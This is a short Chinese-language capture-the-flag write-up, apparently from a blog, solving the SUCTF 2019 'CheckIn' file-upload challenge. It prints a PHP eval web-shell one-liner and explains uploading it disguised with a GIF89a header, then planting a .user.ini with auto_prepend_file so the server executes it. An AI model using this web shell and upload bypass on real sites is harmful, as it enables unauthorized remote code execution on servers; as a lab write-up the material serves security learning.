[SUCTF 2019]CheckIn
题目打开就是一个文件上传的题目试试上传一句话木马
发现检测了内容
之后换种写法绕过
<script language="php">eval($_REQUEST[8]);</script>
发现还检测后缀名,我们使用文件头GIF89a进行绕过
上传成功,我看了网上的方法,结合给的github地址,发现返回的是一个目录,里面有一个index.php,看到了有一个.user.ini的文件,结合网上的知识可以了解到这个是php的一个配置文件,让用户自定义设置,里面有一个配置auto_prepend_file的选项,和require()功能差不多,不过这个是在解析文件之后包含指定的文件。
详细解释前往这里
之后开始进行上传一个.user.ini的文件,内容为
GIF89a? auto_prepend_file=1.jpg
之后当加载了index.php的时候就会包含1.jpg,将它解析为php
使用蚁剑连接即可
本文作者:Running_J
本文链接:https://www.cnblogs.com/ArcherCY/p/16420582.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步